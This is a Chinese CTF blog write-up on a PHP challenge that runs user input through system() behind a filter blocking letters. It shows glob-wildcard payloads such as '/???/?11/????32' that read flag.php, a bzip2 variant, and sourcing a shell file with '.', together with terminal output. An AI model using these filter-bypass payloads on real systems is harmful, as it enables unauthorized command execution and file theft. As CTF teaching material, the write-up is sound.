无字母命令执行

最新推荐文章于 2024-08-27 16:29:55 发布
最新推荐文章于 2024-08-27 16:29:55 发布
阅读量1.1k 收藏 2
点赞数 2
分类专栏: CTF 文章标签: php linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/whq556677/article/details/122246946
版权

先看一道题

<?php
error_reporting(0);
show_source(__FILE__);
if (isset($_GET['a'])) {
    $c=$_GET['a'];
    if (!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)) {
        system($c);
    }else {
        echo "hacker!";
    }
}
?>

代码审计

过滤了字母 分号 反引号 百分号 和 %09 %26 <> 但是可以观察到其实没有过滤空格。

0x01使用 /???/?11/????32 进行绕过

Linux的bin目录一般保存了所有的二进制命令。 cat可以通过/bin/cat 代替。

哪种命令打开文件还能带有数字呢? 可以尝试使用 base64 去打开文件,将文件以base64编码输出

最后只有/???/?11/????32可以

┌──(root💀kali)-[/var/www/html]
└─# /usr/bin/base32 flag.php
MZWGCZ33NBZWQZDIMFTWQ43EONUGOZTWMFTWIZ3WONQX2CQ=
                                                                                                         
┌──(root💀kali)-[/var/www/html]
└─# /???/?11/????32 ????????
MZWGCZ33NBZWQZDIMFTWQ43EONUGOZTWMFTWIZ3WONQX2CQ=

仅适用kali、ubuntu等、centos不适用

因为没有centos 没有base32

0x02 使用 /usr/bin/bzip2 去压缩文件夹绕过

查看可利用

┌──(root💀kali)-[/var/www/html]
└─# locate /???/???/????2
/usr/bin/bzip2
/usr/bin/bzip2recover
/usr/bin/exiv2
/usr/bin/ntlm2
/usr/bin/ragg2
/usr/bin/rasm2
/usr/lib/sasl2

1、/???/???/????2

2、/???/?11/????2

实验环境没效果

其他系统环境

 只有/???/???/????2可以

0x03 使用点(.)去执行sh文件

linux中.相当于source,可以直接执行sh文件

不管有无文件后缀名,都是根据命令来选择打开文件的方式。

使用.执行

kali-2021.2环境不行

换个Linux系统试试可以,诚不欺我!

centos 7 环境可以

ubuntu 12 环境可以

 刚开始kali环境测试不行,后来换其他系统环境可以,以为执行的成功与shell版本有关,最后发现,文件内容仅有ls,也能被 . 执行成功

知识来源链接:命令执行-过滤了字母或者过滤了数字+字母的绕过方法 - Dark1nt - 博客园

咸鱼咸菜
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全系列&php系列:php执行先后顺序_CTFweb类型(二十一)无数字字母命令执行及相关例题
weixin_54626591的博客
06-27 720
php执行先后顺序_CTFweb类型(二十一)无数字字母命令执行及相关例题
php字母数字构造入门
不想去派出所
11-29 635
1 前置知识 1.1 php中的正则匹配函数 最常见的preg_grep() preg_grep(string $pattern, array $array, int $flags = 0): array|false 返回给定数组array中与模式pattern 匹配的元素组成的数组 其余的正则函数可以在https://www.runoob.com/php/php-pcre.html里学习 1.2 正则匹配式 正则表达式手册:https://tool.oschina.net/uploads/apidocs
ctfshow命令执行之无数字字母
HoAd'blog
01-28 3513
命令执行-无数字字母getshell前言一、无字母命令执行二、无字母数字命令执行总结 前言 做ctfshow的时候,碰到命令执行的题,发现这两种类型的题很有趣,学到了很多知识。 前置知识: shell下可以利用.来执行任意脚本 Linux文件名支持用glob通配符代替 一、无字母命令执行 方法1 异或:在PHP中,两个字符串执行异或操作以后,得到的还是一个字符串。所以,我们找到某两个非字母、数字的字符,他们的异或结果是这个字母即可。 方法2 取反:将汉字(%ff%ff%ff)中的某个字符取出来,来进行取反
命令执行-无字母数字webshell
leekos的博客,分享web安全相关知识~
12-26 2081
命令执行字母数字webshell
【bashfuck】bashshell实现无字母命令执行的构造原理
柒月的博客
03-13 898
整个项目的核心是 Linux终端可以通过$'\xxx'的方式执行命令,xxx是字符ascii码的八进制形式,通过这一点,我们可以通过位运算符号和Linux终端的其他特性,在没有数字的情况下继续构造这样的形式以实现无字母数字仅用几个字符就实现任意命令执行
命令执行.无参数RCE
E1even的博客
05-25 1199
linux是操作系统,是服务器操作系统,目前大多数都是采用linux服务系统 主要原因就不多说了 命令执行和代码执行 命令执行实在LINUX终端里面进行执行的,功能强大 代码执行仅仅是存在与代码中,进行代码执行,个人认为执行的也就仅仅是简单的print内容 核心是命令执行,而非代码执行 既然说到命令执行是在LINUX终端进行的,那么我们需要调用LINUX下的命令执行函数,比如常见的: system shell_exec exec 这些常见的命令执行函数 而我们常见的代码执行函数,最多的就是exec,我们很
php正则 过滤 特殊符号,PHP过滤★等特殊符号的正则
weixin_28802499的博客
03-09 729
PHP过滤★等特殊符号的正则复制代码 代码如下:if(preg_match("/[ '.,:;*?~`!@#$%^&+=)(<>{}]|\]|\[|\/|\\\|\"|\|/",$user)){echo '不要在名字里面整些特殊符号,请只使用字母、数字和汉字,当然要你的浏览器要选简体中文GB2312哟,千万不要选繁体、中文HZ等。返回修改后,再来,我等你哟!';exit();}...
文件包含新姿势~
NLost
10-07 1813
通过修改user-agent文件头为恶意代码,nginx在解析时会将网站的请求日志写入对应的log文件中(其实apache也类似)。
Web安全 _ 无字母数字Webshell 总结.pdf
09-06
3. 通配符在RCE(远程命令执行)中的利用:在正则表达式和Shell命令中,`?`和`*`具有不同的含义。在正则表达式中,它们用于匹配字符或表达式的出现次数;而在Shell命令行中,它们用于匹配任意字符或长度的字符串。...
php突破命令限制执行系统命令
05-09
php突破命令限制执行系统命令 可以用于ctf 实战 等多领域使用 十分实用,可以用于突破system等命令被限制的时候
Linux下用ll命令--显示total等字母时乱码的解决方法.docx
02-22
然而,当用户在执行`ll`命令时遇到“total”等字母显示为乱码的情况,这通常是因为系统的字符编码设置不正确,导致无法正确显示非ASCII字符。 在Linux中,字符编码是非常关键的,它决定了系统如何理解和显示各种...
Linux常用命令常用命令命令名必须是小写的英文字母
05-02
命令行的参数提供命令运行的信息或者命令执行过程中所使用的文件名。如果命令行中没有提供参数,则命令使用标准文件进行输入/输出。 输入命令有多种方式: 1. 多命令行:允许将多个命令写在一行依次执行,用分号隔...
ctfshow-web入门——命令执行(2)(web41-web57)
m0_62905745的博客
03-16 1097
本篇文章是ctfshow的web入门部分的命令执行部分wp(web41-web 57),包括一些题目解答,自己的笔记和总结,有错误还希望大家指正,一起学习进步!
CTFshow命令执行29-123
qq_43534481的博客
08-06 1482
CTFshow命令执行WP
php正则匹配反斜杠问题
leekos的博客,分享web安全相关知识~
12-26 1307
php正则匹配反斜杠问题
[CTFSHOW]命令执行55-74
Huamang的博客
03-05 1594
web 55 if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){ system($c); } }else{ highlight_file(__FILE__); } bin目录: bin为binary的简写主要放置一些 系统的必备执行档例如:cat、cp、chmod df、dmesg、gzip、kill、ls、
无数字字母命令执行及相关例题
DKPT的博客
11-24 77
字母数字。
ctfshow命令执行(web29-web56)第一部分
qq_63928796的博客
10-05 1725
过滤了flag可以用*或者?绕过。
一道关于php文件包含的CTF题
最新发布
m0_62903168的博客
08-27 2319
这是index.php的页面。点击login后会发现url里多了action的参数,那么我们就可以通过它来获取源码。?再通过base64的解码可以查看源码。
Linux命令详解:小写字母命令名与使用技巧
命令格式通常由命令名、选项和参数组成,其中选项以"-"开头,多个选项可以合并用一个"-",参数则提供命令执行所需的信息或文件名。命令执行成功后,会返回0值。 2.2章节中,简单命令被逐一介绍,如`who`列出当前...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值